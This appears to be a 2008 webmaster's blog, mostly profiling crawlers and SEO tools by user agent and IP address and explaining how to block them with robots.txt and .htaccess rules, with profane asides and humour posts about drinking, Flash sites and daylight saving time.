"mozilla/5.0 (compatible; RTGI; http://rtgi.fr/)"
The IP's they operate from are:
88.191.50.170 -> sd-8985.dedibox.fr.
91.121.108.180 -> t800.rtgi.eu.
91.121.25.182 -> merlin.rtgi.eu.
91.121.25.184 -> r2d2.rtgi.eu.
91.121.79.160 -> c3po.rtgi.eu.
The old address of 88.191.50.170 doesn't appear to be active since 04/13/2007 so I probably wouldn't worry about that too much unless you just want to block that dedicated hosting range for good measures.
inetnum: 88.191.3.0 - 88.191.248.255
netname: FR-DEDIBOX
descr: Dedibox SAS
descr: Paris, France
route: 88.160.0.0/11
The dedicated host they currently use has this range of IPs:
inetnum: 91.121.0.0 - 91.121.31.255
netname: OVH
descr: OVH SAS
descr: Dedicated Servers
descr: http://www.ovh.com
So there you go, another way to make your site part of the anti-social media by keeping the snoops out.


Project Rialto's PRCrawler Is Data Mining?

Since I whitelist allowed bots I've had Project Rialto blocked since the beginning but I was curious what they were doing since they first showed up on my radar on 01/23/2008 and kept coming back over and over.

From one of their job ads:

We are designing high-performance algorithms and developing reliable, fault-tolerant and scalable real-time systems that can handle massive volume of data for in-depth analysis of user behavior to enable targeted advertising.

and...

Research and investigate academic and industrial data mining, machine learning and modeling techniques to apply to our specific business case
Oh boy!

It appears they want to crawl our sites and use that information to shove more ads in our face.

Somehow, I don't think so...

If you're going to mine data, shouldn't you get the URLs right?

The site they're attempting to "mine" is on a Linux box and URLs are case sensitive and my URLs all have upper/lower case in them yet the PRCrawler only asks for those URLs in all lower case so even if I left them crawl my site they'd get nothing but 404s.

No wonder their home page says they're a "stealth company" because I'd hide too if I couldn't even get the proper case of the URLs right.

Here's their user agent:
"PRCrawler/Nutch-0.9 (data mining development project; crawler@projectrialto.com)"
They operate from the following IPs:
64.47.51.153
64.47.51.158
67.202.0.157
67.202.0.17
67.202.0.71
67.202.10.65
67.202.18.229
67.202.29.20
67.202.3.112
67.202.3.141
67.202.3.151
67.202.56.219
67.202.58.214
67.202.59.117
67.202.62.162
67.202.62.45
72.44.36.20
72.44.36.8
72.44.37.72
72.44.39.55
The first two were from masergy.com, the rest are all from compute-1.amazonaws.com.
host-64-47-51-153.masergy.com.
host-64-47-51-158.masergy.com.
I haven't seen anything from masergy.com since the initial contact but that's only 2 months ago so who knows.

Don't know where they primed the pump for their data mining operation since they already had lots of information about my site when they attempted to crawl, but since it was all lower case it was completely useless.

I'm just curious if they got it my URLs from somewhere already in lower case or someone there slapped a tolower() around a line of code when importing the URLs into Nutch.

Don't know, don't care, it's amusing either way.

Good luck with Project Rialto, you're going to need it.

Wednesday, April 09, 2008

Radian6's R6_FeedFetcher Fetching More Than Feeds

For those of you unfamiliar with Radian6 it's a "social media monitoring tool" because apparently everyone with an opinion on the internet needs someone to spy on their ass since we're disruptive.

Well bummer.

Isn't it a shame the good old days are gone where companies told you everything you needed to know about their brand and you had to be a journalist just to get your opinion heard?

Of course those so-called journalists never gave you their real opinion because of fear of losing advertisers so it was all candy coated bullshit that just bordered on the truth because advertisers couldn't handle the truth fearing nobody would buy their shit.

Tough shit and god bless the great equalizer called the Internet that leveled the playing field between consumers and companies so we can find out what's really going on without everything being filtered through the company spin doctor.

Their crawler details are:

142.166.3.122 "R6_FeedFetcher(www.radian6.com/crawler)"
The amusing thing about the R6_FeedFetcher is I never see it fetching the feed, instead it's trying to fetch pages linked from the feed, which is what we call a crawler and not a fucking feed fetcher.

Does it read robots.txt to see if it's allowed beyond my RSS feed?

Fuck no.

I looked at all accesses on my RSS feed and didn't see anything obvious so maybe they get RSS feeds from FeedBurner or something similar, who knows.

Anyway, it's blocked now on my other site so I can be as disruptive as I want there.

However, who wants to place bets that this disruptive post will be monitored?


P.S. The site R6_FeedFetcher is blocked on is not this blog for first time readers ;)

Update:

After doing some research it appears they also have the following user agent:
R6_CommentReader(www.radian6.com/crawler
Also, read this interesting post about Radian6 on Simon's blog.

Friday, April 04, 2008

Discovery Engine's Discobot Discovered My Bot Blocker

I found this little Discobot from Discovery Engine trying to dance around on my server but the bot blocker bouncer at the door was already keeping him behind the velvet ropes.

Here's a sample of what I saw on my site:

208.96.54.74 "GET /robots.txt"
"Mozilla/5.0 (compatible; discobot/1.0; +http://discoveryengine.com/discobot.html)"

208.96.54.68
"Mozilla/5.0 (compatible; discobot/1.0; +http://discoveryengine.com/discobot.html)"
It does honor robots.txt just like they said it did but it cached it for about 48 hours between visits.

They were nice enough to provide the range of IPs it uses:
208.96.54.67 - 208.96.54.96
Those IPs are from Servepath which I already block.

Between whitelisting allowed bots and blocking more data centers then I'd care to admit, this poor little Discobot didn't stand a chance to discover anything.

Call back when you're all grown up and ready to send traffic.


Persaibot - The Rude Crawler

I saw this little Persaibot hit my site today without even looking at robots.txt and their website has the balls to say:

Persai uses this bot to crawl the web. It's probably the nicest bot with the greatest personality in the world. Seriously, give it some attention.
Exactly how nice can a bot be that doesn't read robots.txt?

Did you read it and cache it some other day?

Doesn't matter, that was more than 24 hours ago, read it again.

I checked my logs from yesterday, it didn't read it then either and Persai hadn't visited my site in about a month before that.

I'm sorry, you have made the huge faux pas in robot rudeness.

Here's the intel I have on this little bot:
71.204.131.68 [c-71-204-131-68.hsd1.ca.comcast.net]
"PersaiBot/2.1-dev3a (Persai web crawler; http://www.persai.com/bot.html; bot at persai dot com)"

67.202.55.205 [ec2-67-202-55-205.compute-1.amazonaws.com]
"Mozilla/5.0 (compatible; Persaibot/2.71828183; +http://www.persai.com/bot.html)"

76.102.193.127 [c-76-102-193-127.hsd1.ca.comcast.net]
"Mozilla/5.0 (compatible; Persaibot/2.71828183; +http://www.persai.com/bot.html)"
Now the true irony here is that the CEO of Persai posted on his blog complaining about another search engine called Spock scraping every little bit of data about him but at least Spock claims to honor robots.txt.

Must be a karma thing ;)

DART Agent - Another Annoying Distributed Tool

This little annoying DART thing that keeps bouncing off my web site appears to be written by CRS4, the Center for Advanced Studies, Research and Development in Sardinia.

It would appear DART stands for "Distributed Agent-based Retrieval Tools" and they even have a workshop in '06 about this damn thing touted as "The Future of Search Engines' Technologies" that had people from Yahoo!, Google, Quaero and Ask attending.

Here's a sample of some IPs it operates from and the shitload of versions this thing has:

212.123.91.18 "DART Agent, version 1.2 (build 14062007)"
212.123.91.78 "DART Agent, version 1.2.7 (build 27062007)"
212.123.91.78 "DART Agent, version 1.4 (build 17102007)"
156.148.18.62 "DART Agent, version 1.4 (build 29102007)"
156.148.18.62 "DART Agent, version 1.4.1 (build 05112007)"
156.148.18.62 "DART Agent, version 1.4.2 (build 08112007)"
212.123.91.78 "DART Agent, version 1.4.3 (build 15112007)"
212.123.91.78 "DART Agent, version 1.4.3 (build 19112007)"
212.123.91.78 "DART Agent, version 1.4.4 (build 05122007)"
212.123.91.78 "DART Agent, version 1.4.5 (build 06122007)"
212.123.91.78 "DART Agent, version 1.4.6 (build 14012008)"
156.148.18.62 "DART Agent, version 1.4.6 (build 14012008)"
212.123.91.78 "DART Agent, version 1.4.7 (build 24012008)"
212.123.91.78 "DART Agent, version 1.4.8 (build 04022008)"
212.123.91.78 "DART Agent, version 1.5 (build 08022008)"
212.123.91.78 "DART Agent, version 1.5.1 (build 14022008)"
212.123.91.78 "DART Agent, version 1.5.2 (build 18022008)"
212.123.91.78 "DART Agent, version 1.5.5 (build 27022008)"
156.148.18.62 "DART Agent, version 1.5.6 (build 28022008)"
212.123.91.78 "DART Agent, version 1.5.6 (build 28022008)"
212.123.91.78 "DART Agent, version 1.5.1 (build 14022008)"
212.123.91.78 "DART Agent, version 1.5.7 (build 05032008)"
82.85.70.40 "DART Agent, version 1.5.2 (build 18022008)"
212.123.91.78 "DART Agent, version 1.5.8 (build 06032008)"
156.148.18.62 "DART Agent, version 1.5.8 (build 06032008)"
82.85.70.42 "DART Agent, version 1.5.8 (build 06032008)"
212.123.91.78 "DART Agent, version 1.5.9 (build 19032008)"
212.123.91.78 "DART Agent, version 1.5.8 (build 06032008)"
212.123.91.78 "DART Agent, version 1.5.9 (build 20032008)"
213.205.44.51 "DART Agent, version 1.5.8 (build 06032008)"
213.205.44.52 "DART Agent, version 1.5.8 (build 06032008)"
212.123.91.78 "DART Agent, version 1.6 (build 02042008)"
213.205.44.52 "DART Agent, version 1.5.8 (build 06032008)"
156.148.18.62 "DART Agent, version 1.6.0 (build 02042008)"
Looks like so far it's only operating out of Italy and they're nice enough to provide reverse DNS when it operates off their servers "dartcn01.crs4.it" and even another source "dart02.itsm.tiscali.com" so the crawler could be verified but other sources couldn't be verified such as "82-85-70-40.b2b.tiscali.it" so it's going to be a problem child for anyone that wants to let it play but make sure it's not being spoofed.

Just what the web needs, more distributed web technology to bug the fuck out of webmasters just trying to scratch out a living on the internet.

Oh well, it can't play on my server so what the hell do I care anyway!


Saturday, March 29, 2008

WHO is Scraping My Site!

Note the lack of a question mark in the title because this wasn't a question about "WHO?" but an actual statement about "WHO!" and by that I mean the WHO as in an office of the World Health Organization.

It registered 411 page requests from 203.94.76.59 which is a non-portable address assigned to the WHO Representative Office in Sri Lanka.

Here's the IP and UA:

203.94.76.59
"Mozilla/4.0 (compatible; MSIE 6.0; Windows 98)"
Here's the WHOIS:
inetnum: 203.94.76.56 - 203.94.76.63
netname: WHO-SLT-LK
country: LK
descr: WHO Representative Office
descr: 385, Health Inform. Centre, Suwasiripaya, Deens Road, Colombo-10
admin-c: NS198-AP
tech-c: NS198-AP
status: ASSIGNED NON-PORTABLE
mnt-by: MNT-SLT-LK
source: APNIC

person: Network Administrator SLTNet
nic-hdl: NS198-AP
address: Sri Lanka
country: LK
mnt-by: MNT-SLT-LK
source: APNIC
It pretended to be a human browser like so many of them do these days by pulling all the images from the index page and then it took off ripping pages like a bandit.

It wasn't even a smart bot as the first link it hit off the index page was my bot trap which is easily flagged and avoidable in the robots.txt as a no crawl zone, so it definitely wasn't human.

Of course the robots.txt file is my other bot trap but what the hell.

Then it went screaming along asking for the next 409 pages at 2-3 pages a second.

It would appear that WHO should check out the health of their computer network as something is rotten in their offices in Sri Lanka.

Friday, March 28, 2008

REBI-Shoveler Digging for Korean Search Engine

REBI-Shoveler must be easily overlooked as it's very unusual to go to a search engine and type in the user agent and get no authoritative hit from any bot hunter whatsoever. There were tons of hits from various web stat pages but nothing I could easily find that gave me any clue what in the hell this thing was.

With this little information all I knew was it came from Korea, otherwise I was stumped:

116.122.36.150 "REBI-Shoveler v0.1"
Finally I decided to see if I could find any more clues in the several years of bot tracking archive files I keep and sure enough, there was a single original hit on my server that contained the answer I was looking for:
116.122.36.48
"REBI-Shoveler/RS Ver. -100.0 (REBI's great worker ... ; http://rebi.co.kr; deisys@rebi.co.kr)"
This bot operates out of multiple IPs in the range of 116.122.36.* and here's a little translation for you from their site about REBI, but not mention about robots.txt nor did it ask for the file when it visited my site today, so it's behaving badly.

Now you know who REBI is that's shoveling shit off of your server.

Enjoy.

We'll Have Anon Of That, John Doe Must Go

Looks like JonDonym - the internet anonymisation service is actively operating as those little anonymous hits are coming from their servers.

I have a couple of actual scrapes happening from their IPs, who would suspect abuse of anon proxies, right?

Here's a couple of examples of activity:

141.76.45.34 [proxy1.anon-online.org.]
Mozilla/5.0 (Windows; U; Windows NT 5.1; de; rv:1.8.1.13) Gecko/20080311 Firefox/2.0.0.13

141.76.45.35 [proxy2.anon-online.org.]
Mozilla/5.0 (Windows; U; Windows NT 5.1; de; rv:1.8.1.13) Gecko/20080311 Firefox/2.0.0.13

Don't know what other IPs it operates from but 141.76.45.* and anything resolving to anon-online.org are blocked for now.

Good luck with your John Doe anonymity while I work on my taxes as you've just been H&R Blocked!

With tax deadlines close at hand I couldn't resist ;)

Monday, March 24, 2008

Please Install Flash - Idiots Guide To Flash Web Stupidity

Time to rant about a big pet peeve of mine, that little line of javascript that detects whether or not Flash is installed and the stupid shit developers do when it fails.

For a little introduction to the problem, I run Firefox with NoScript enabled globally for security purposes. However, I can easily enable javascript with a click except some developers do some really stupid shit that's costing their clients visitors.

Here's a few brain dead examples of Flash sites done wrong in the hands of idiots:

1. When javascript is disabled a blank page often results without even a hint, looks broken, visitors go away thinking you're stupid as dirt for putting up a blank page.

2. Redirecting visitors to a "Please Download Flash" page is just asinine. When visitors then enable javascript so your flash will work we're off on some other stupid page instead of where we wanted to go. Yup, frustrate your visitors and they'll just go elsewhere where sites aren't developed by designers that rode the short yellow bus to VoTech.

3. Using the NOSCRIPT tag to incorrectly tell us we don't have Flash installed because that tag actually means we have javascript disabled and you have no fucking clue if we have Flash installed or not until we turn on javascript you fucking idiots. Tell us correctly to ENABLE JAVASCRIPT to run the site in your NOSCRIPT tag and then let the javascript tell us we don't have Flash installed.

I'm sure I'll have some other addendums later but these are the top 3 offending things moronic Flash site developers do off the top of my head.

Anyone else got a pet Flash peeve?

Friday, March 14, 2008

SearchMe Demos Wicked Cool Visual Search Engine

Looks like I was right on the money back in Oct '07 when I announced that I had spotted SearchMe taking screen shots on one of my sites and I knew this was a hot news item but couldn't get the Sphinners to bite on it.

Here we are 6 months later and the story broke a couple of days ago on the Silicon Valley WebGuild:

Searchme is a new search engine that captures images of web pages and allows users to navigate visually through these page snapshots.
Searchme is currently running a private beta but the flash demo on their web site is real fucking cool so I hope their search technology is as good because this is so wicked it could be a real Google killer.



I'll bet Microsoft, Yahoo or Ask tries to buy this technology ASAP before Google can get their hands on it as something this hot could put any of the lesser search engines back on the map.

If you want information about their spider named Charlotte and IP addresses so you can let Searchme into your site and past your firewall, read my previous post with all the pertinent information.

Wednesday, March 12, 2008

Welcome to Opt-In Web 3.0 Politeness

This summary is not available. Please click here to view the post.

Sunday, March 09, 2008

Gone Fishkin With More SEOMoz Tool Activity

In my continue series of exposing SEO tools we find this little SEOmoz-bot over at SEOmoz.

I'll give SEOmoz some credit where credit is due in they at least identify their tool as a bot so it can be blocked if you want. However, they don't check robots.txt to see if the bot is allowed as I think they assume it's always going to be used by the site owner but it could just as easily be used on some competitor's site as well.

Here are the IPs and the user agent used:

209.40.115.202 "SEOmoz-bot"
209.40.116.200 "SEOmoz-bot"
The IP's belong to HopOne which provides various services including hosting.
OrgName: HopOne Internet Corporation
NetName: HOPONE-DCA2-4
NetRange: 209.40.96.0 - 209.40.127.255
I think that range is safe to block as it appears they use 'DC' in the net name of their data centers but it's probably worth checking to see what bounces for a few days to make sure.

Of course the best SEO is secure SEO, so block 'em ;)

Smack the SMILE SEO TOOLS Off Your Face

Some spamming assholes in Russia think automatic directory submission is the same as SEO and added one of my sites to their so called SMILE SEO TOOLS.

Here's a list of the various user agents I've seen claiming to be this tool:

"SMILESEOTools"
"SMILE SEO Tools"
"SMILESEOTools(Windows;compatible;MSIE6.0;I;WindowsNT5.0)"
The last user agent with an extremely lame ass attempt to mimic MSIE 6 gave me a good giggle.

Here's the list of IP's using this directory spamware, probably mostly proxy sites in Russia would be my guess as they have a ton of proxy sites for spamming over there.

Yes, 114 lovely IP's using SMILE SEO Tools for your veiwing pleasure:
217.20.168.113
217.151.225.42
213.247.143.205
213.232.196.102
213.184.238.34
213.170.69.66
212.96.222.197
212.96.200.33
212.96.200.115
212.59.98.125
212.220.104.230
204.15.76.250
201.12.176.18
195.91.168.193
195.72.145.7
195.72.142.106
195.46.188.3
195.239.202.65
195.234.114.122
195.234.109.71
195.218.220.26
195.162.39.54
195.131.84.202
195.131.188.138
195.122.250.205
194.44.191.7
194.24.240.23
193.239.255.22
193.238.96.5
193.17.174.7
91.77.38.45
91.76.44.134
91.76.34.0
91.76.159.205
91.76.156.161
91.76.111.247
91.76.108.170
91.124.75.182
91.124.35.208
91.124.245.129
91.124.232.195
91.124.165.97
91.124.143.254
91.122.51.213
90.188.71.41
89.250.2.129
89.19.164.14
89.179.97.170
89.179.96.253
89.179.110.182
89.179.103.190
89.178.209.180
89.178.143.161
87.240.15.33
87.240.15.26
87.237.113.6
87.117.35.56
87.117.33.5
86.57.220.142
85.94.34.227
85.238.106.44
85.238.106.35
85.236.26.202
85.192.165.43
85.141.228.16
85.141.213.13
85.140.58.175
85.140.54.95
85.140.53.21
85.140.52.233
85.140.154.97
85.140.118.4
85.140.117.215
85.140.116.105
84.42.57.72
84.253.75.67
84.154.102.78
83.237.96.4
83.237.76.106
83.237.211.116
83.237.200.54
83.237.186.74
83.237.169.118
83.167.116.85
83.167.112.224
82.207.36.70
82.207.14.51
82.207.117.186
82.207.0.248
81.95.178.185
81.94.22.114
81.3.158.138
81.25.53.49
81.200.7.88
80.92.96.7
80.80.111.240
80.248.156.79
78.106.58.185
78.106.189.47
77.247.172.250
77.247.165.196
77.247.165.14
77.247.160.89
77.239.192.6
77.235.113.131
77.235.101.11
77.123.62.125
77.122.231.9
74.232.4.137
62.33.7.146
62.213.18.70
62.168.234.78
62.140.244.20
62.118.2.146
Just to help you understand where these IP's were coming from, here's the reverse DNS of the same list:
ppp91-77-38-45.pppoe.mtu-net.ru.
ppp91-76-44-134.pppoe.mtu-net.ru.
ppp91-76-34-0.pppoe.mtu-net.ru.
ppp91-76-159-205.pppoe.mtu-net.ru.
ppp91-76-156-161.pppoe.mtu-net.ru.
ppp91-76-111-247.pppoe.mtu-net.ru.
ppp91-76-108-170.pppoe.mtu-net.ru.
182-75-124-91.pool.ukrtel.net.
208-35-124-91.pool.ukrtel.net.
129-245-124-91.pool.ukrtel.net.
195-232-124-91.pool.ukrtel.net.
97-165-124-91.pool.ukrtel.net.
254-143-124-91.pool.ukrtel.net.
ppp91-122-51-213.pppoe.avangarddsl.ru.
41.71.188.90.adsl.tomsknet.ru.
nat.tushino.com.
hst14-nat.n.tc-exe.ru.
89-179-97-170.broadband.corbina.ru.
89-179-96-253.broadband.corbina.ru.
89-179-110-182.broadband.corbina.ru.
89-179-103-190.broadband.corbina.ru.
89-178-209-180.broadband.corbina.ru.
89-178-143-161.broadband.corbina.ru.
nat.a10.qwerty.ru.
nat1.a3.qwerty.ru.
6-113.admiral.tvoe.tv.
Host 56.35.117.87.in-addr.arpa not found: 3(NXDOMAIN)
5.33.117.87.donpac.ru.
220-142.pppoe.vitebsk.by.
85.94.34.227.adsl.sta.mcn.ru.
85-238-106-44.broadband.tenet.odessa.ua.
85-238-106-35.broadband.tenet.odessa.ua.
Host 202.26.236.85.in-addr.arpa not found: 3(NXDOMAIN)
85-192-165-43.dsl.esoo.ru.
ppp85-141-228-16.pppoe.mtu-net.ru.
ppp85-141-213-13.pppoe.mtu-net.ru.
ppp85-140-58-175.pppoe.mtu-net.ru.
ppp85-140-54-95.pppoe.mtu-net.ru.
ppp85-140-53-21.pppoe.mtu-net.ru.
ppp85-140-52-233.pppoe.mtu-net.ru.
ppp85-140-154-97.pppoe.mtu-net.ru.
ppp85-140-118-4.pppoe.mtu-net.ru.
ppp85-140-117-215.pppoe.mtu-net.ru.
ppp85-140-116-105.pppoe.mtu-net.ru.
Host 72.57.42.84.in-addr.arpa not found: 3(NXDOMAIN)
client1-3.amtelsvyaz.ru.
p549A664E.dip.t-dialin.net.
ppp83-237-96-4.pppoe.mtu-net.ru.
all-seminars.ru.
ppp83-237-211-116.pppoe.mtu-net.ru.
ppp83-237-200-54.pppoe.mtu-net.ru.
ppp83-237-186-74.pppoe.mtu-net.ru.
ppp83-237-169-118.pppoe.mtu-net.ru.
n116h85.catv.ext.ru.
n112h224.catv.ext.ru.
Host 70.36.207.82.in-addr.arpa not found: 3(NXDOMAIN)
pool-2user51.dc.ukrtel.net.
us.com.ua.
Host 248.0.207.82.in-addr.arpa not found: 3(NXDOMAIN)
185.178.95.81.in-addr.arpa turnskin.kiev.ua.
185.178.95.81.in-addr.arpa werewolf.kiev.ua.
185.178.95.81.in-addr.arpa filippova.kiev.ua.
185.178.95.81.in-addr.arpa rogovskiy.kiev.ua.
185.178.95.81.in-addr.arpa rogovskaya.kiev.ua.
185.178.95.81.in-addr.arpa prudaev.kiev.ua.
185.178.95.81.in-addr.arpa filippov.kiev.ua.
114.22.94.81.in-addr.arpa vpnpool-81-94-22-114.users.mns.ru.
Host 138.158.3.81.in-addr.arpa not found: 3(NXDOMAIN)
49.53.25.81.in-addr.arpa NAT-81-25-53-49.ultranet.ru.
Host 88.7.200.81.in-addr.arpa not found: 2(SERVFAIL)
7.96.92.80.in-addr.arpa gw7.eth.zelcom.ru.
240.111.80.80.in-addr.arpa ce2-ats32.aaanet.ru.
Host 79.156.248.80.in-addr.arpa not found: 3(NXDOMAIN)
185.58.106.78.in-addr.arpa 78-106-58-185.broadband.corbina.ru.
47.189.106.78.in-addr.arpa 78-106-189-47.broadband.corbina.ru.
Host 250.172.247.77.in-addr.arpa not found: 3(NXDOMAIN)
Host 196.165.247.77.in-addr.arpa not found: 3(NXDOMAIN)
Host 14.165.247.77.in-addr.arpa not found: 3(NXDOMAIN)
Host 89.160.247.77.in-addr.arpa not found: 3(NXDOMAIN)
6.192.239.77.in-addr.arpa libra.comintel.ru.
131.113.235.77.in-addr.arpa 131.113.235.77.dyn.idknet.com.
11.101.235.77.in-addr.arpa 11.101.235.77.dyn.idknet.com.
125.62.123.77.in-addr.arpa unshaven.yawner.volia.net.
9.231.122.77.in-addr.arpa gearing.butter.volia.net.
137.4.232.74.in-addr.arpa adsl-232-4-137.asm.bellsouth.net.
146.7.33.62.in-addr.arpa gw.quaynet.ru.
70.18.213.62.in-addr.arpa h62-213-18-70.ip.syzran.ru.
78.234.168.62.in-addr.arpa virtual-234-78.utk.ru.
20.244.140.62.in-addr.arpa nat3.birulevo.net.
Host 146.2.118.62.in-addr.arpa not found: 3(NXDOMAIN)
113.168.20.217.in-addr.arpa mediainfotour-gw.cs1-nan.kv.wnet.ua.
;; reply from unexpected source: 72.51.32.76#53, expected 72.51.32.92#53
;; Warning: ID mismatch: expected ID 10615, got 39356
;; reply from unexpected source: 72.51.32.76#53, expected 72.51.32.92#53
;; Warning: ID mismatch: expected ID 10615, got 39356
;; connection timed out; no servers could be reached
205.143.247.213.in-addr.arpa is an alias for 205.192.143.247.213.in-addr.arpa.
205.192.143.247.213.in-addr.arpa host-205.SPM.213.247.143.192.0xfffffff0.macomnet.net.
102.196.232.213.in-addr.arpa host.hnt.ru.
34.238.184.213.in-addr.arpa 34-nat.cosmostv.by.
66.69.170.213.in-addr.arpa relay.volex.spb.ru.
Host 197.222.96.212.in-addr.arpa not found: 3(NXDOMAIN)
Host 33.200.96.212.in-addr.arpa not found: 3(NXDOMAIN)
Host 115.200.96.212.in-addr.arpa not found: 3(NXDOMAIN)
Host 125.98.59.212.in-addr.arpa not found: 3(NXDOMAIN)
Host 230.104.220.212.in-addr.arpa not found: 3(NXDOMAIN)
250.76.15.204.in-addr.arpa elanora.aatikah.com.
18.176.12.201.in-addr.arpa 201-12-176-18.intelignet.com.br.
193.168.91.195.in-addr.arpa h195-91-168-193.ln.rinet.ru.
7.145.72.195.in-addr.arpa user-195.72.145.7.lvivnet.org.
106.142.72.195.in-addr.arpa gw.itstime.ru.
3.188.46.195.in-addr.arpa ts1-b3.Irkutsk.dial.rol.ru.
65.202.239.195.in-addr.arpa ts1-a65.Irkutsk.dial.rol.ru.
122.114.234.195.in-addr.arpa 195.234.114.122.ukrlink.net.ua.
;; connection timed out; no servers could be reached
26.220.218.195.in-addr.arpa adsl-stat-0534.comch.ru.
Host 54.39.162.195.in-addr.arpa not found: 3(NXDOMAIN)
202.84.131.195.in-addr.arpa cache.wplus.net.
Host 138.188.131.195.in-addr.arpa not found: 3(NXDOMAIN)
205.250.122.195.in-addr.arpa 205.250.nat.smilenet.sandy.ru.
7.191.44.194.in-addr.arpa mail2.complex.lviv.ua.
23.240.24.194.in-addr.arpa 23.240.dsl.westcall.net.
Host 22.255.239.193.in-addr.arpa not found: 3(NXDOMAIN)
5.96.238.193.in-addr.arpa nat.itt.net.ua.
7.174.17.193.in-addr.arpa pptp-out2.radiokom.kr.ua
Well, doesn't that really sum it up well?

Enjoy the list, block 'em if you want.

Heck, just block the entire country of Russia and the Ukraine entirely and hide the children in your bomb shelter just in case they get pissed.

More Pesky SEO Tools To Block

Seems there is something in Germany called SEO.AG that has been pestering my site for quite some time.

The IP and User Agent it uses is:

85.214.35.2 "SEO[.AG] - Search Engine Optimizer Bot [http://www.seo.ag]"
However, they also run a web proxy on 85.214.35.2 so you have to block the IP to stop all the nonsense.

I'm not sure which is worse, the scrapers, proxies, aggrators, or the SEOs and their tools.

You Know You Drink Too Much When...

When you wake up face down in a pizza you know you got mad drinking skills, especially when you went face down in mid-bite of the pizza.

When you wake up and your pillow is covered in pizza vomit, that's madder skills cause you didn't die in your sleep aspirating on pizza vomit. Having to shave your beard off because you can't seem to wash out all the partially digested bits of pizza is a bit embarrassing. However, having the side of your face that laid on the pizza sauce all night get stained and looking bright red all day is priceless.

When you wake up under your bed, realize you're on cold hard wood, bump your head on wood when you try to get up and suddenly panic thinking you're in a coffin because it's all wood and you can't get up, you've truly arrived.

When leaving a party and the elevator makes your stomach flip-flop you panic as the doors open and vomit down the crack between the elevator and the wall and spew into the elevator shaft just because there's no where else to suddenly yak, you're working your way to be an AA superstar!

When you're leaving a party and have no other place than to barf in a water fountain in the lobby of an apartment complex and as you're leaving giggle as you hear people walk up to take a drink screaming, you're in the club!

When you barf up brightly colored red nacho chips and suddenly panic thinking your stomach is bleeding profusely until you remember what you ate .... and then drink too much and barf a couple of nights later just to make sure that's what it really was.

When you and your friends are out partying all night and you suddenly fill up the floor of the car with vomit and 6 of your friends bail out the window just to get away from you

You know your friends are all alkies too when the topic of conversation is always which one of you wussies is going to drop a street pizza or a technicolor yawn first

Another clue your friends have drinking problems is when they fall out of the car when they open the door

A clue something bad happened is when you wake up on a sofa in a house you don't remember, find your glasses in your pocket and when you put them on can't see thru the thick film of dry vomit that's encrusted them

FINALLY, last but not least, you know it's time to stop drinking when you wake up and flies are picking the vomit out of your nose.

What Time Is It Anyway?

Got up this morning and all the computers and TV's said it was 9:00am but the phones and alarm clocks said it was 8:00am.

Obviously this was the daylight savings bullshit gone bad but how in the hell could someone fuck up the atomic time clock which the alarms and phones feed from?

Had this been an actual day when I really needed to get up and be somewhere by 8am I would've been fucked since both the alarm clock and the alarm in the phone, which I prefer because it's louder, would've both malfunctioned.

Anyway, around 11:00am everything was back in synch.

Don't you just love fucking daylight savings time?

Blech.

There Goes the Bad Neighborhood

Isn't it ironic that a day after I wrote about stopping snooping SEO tool's here comes one of them trying to crawl one of my websites.

The user agent and IP address are:

208.77.208.198 [emeraldarborvitae.viviotech.net.]
"Bad-Neighborhood Link Analyzer (http://www.bad-neighborhood.com/)"
They were automatically blocked on my site because I white list only allowed user agents and they use an unauthorized user agent name, but they could always switch to mimic a browser so in the long run it's best to block the IP range.

Turns out Viviotech is the host of Bad Neighborhood's site:
OrgName: Vivio Technologies
NetRange: 208.77.208.0 - 208.77.211.255
CIDR: 208.77.208.0/22
After you block this data center range the tools from Bad Neighborhood can't be used to scan your site, check your Apache server headers, or any other thing.

Sorry, but you're not allowed back into my neighborhood.

Buh bye.

Saturday, March 08, 2008

Jayde NicheBot Crawls for iEntry's Web of Sites

Who out there remembers the Jayde directory?

Some of us submitted our sites to Jayde way back in '96 or '97, who knows exactly, and now our sites are being hit by something called the "Jayde NicheBot".

"Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US) Jayde NicheBot"
I was curious why some site I submitted to about 10 years ago was pinging my server all these years later so I did a little research to see what they'd been up to in the interim and they appear to have been very prolific, almost to domain park proportions.

Jayde is currently owned by iEntry.com and if you have McAfee SiteAdvisor enabled in your browser it goes RED meaning that iEntry has something negative on file with SiteAdvisor that says the following:
Feedback from credible users suggests that this site sends either high volume or 'spammy' e-mails.
Took a look and found someone that posted one of those 'spammy emails' with a ton of iEntry's domain names listed.

On iEntry's website they claim:
iEntry properties include more than 370 Web sites and over 100 e-mail newsletters that are viewed by more than 5 million users every month.
Did a quick search for their 370 sites and Yahoo finds over 170 of them.

It appears iEntry owns ExactSeek.com, sitepronews.com, webpronews.com, metawebsearch.com, seo-news.com (and forum), and a ton of directories, bunch of sites here, shitload of sites there, and last but not least here it's tied together with ISEDN.ORG

Google and Yahoo could find listings about my sites in a bunch of their directories which begs the question:

Why does Google and Yahoo index all those redundant directories?

I found references to my sites in about 40 of them, there's a shock, knock me over with a feather. About 40 sites was all Google and Yahoo would easily report, and the answer to the "why are they indexed?" question appears to be that the order of the listings in the directory are changed for the same content on a different site so it seems to be unique per directory as far as the search engines are concerned. Maybe there were other changes as well, I didn't look to deep.

However, I did check Live search which doesn't appear to be so gullible as it only reported the duplicate content in 5 sites.

Hey, submit your link, it's FREE and you can advertise too!

Hope I didn't blow out anyone's sarcasm meter with that last quip.

Friday, March 07, 2008

Slow Down Nosy SEO's and Snooping Competitors

Most webmasters spend a lot of time and effort working on marketing their website, or pay someone a lot of money to do this, yet don't do a few common sense things that keep lazy and nosy assed SEO's or other competitors from quickly analyzing all your hard work and simply stealing what you've done.

Not that you can completely stop them because much of the competitive information about who links to you is already public, collected by search engines and toolbars, but you can sure as hell make it a little more difficult to get the rest of the data they want.

Since the SEO Chicks published a list of competitive research tools to help those nosy SEO's snoop, I just thought it would be fair and useful to have a nice list of ways to stop as many of those those snooper tools as possible.

Block Archive.org - No need to let anyone see how your site evolved, snoop or even scrape through archive pages without your knowledge so block their crawler.

User-agent: ia_archiver
Disallow: /
Rumor has it that the ia_archiver may crawl your site anyway so adding it to your .htaccess file is a good precaution as well.
RewriteCond %{HTTP_USER_AGENT} ^ia_archive
RewriteRule ^.* - [F,L]
Block Search Engine Cache - Some people cloak pages and just show the search engines raw text yet show the visitors a complete page layout. Who cares, that's your business and a competitive edge you don't need to share, plus pages can be scraped from search engine cache as well, so disable cache on all pages.

Insert the following meta tag in the top of all your web pages:
<meta content='NOARCHIVE' name='ROBOTS'>
Block Xenu Link Sleuth - Why do you need people sleuthing your site? Screw 'em...

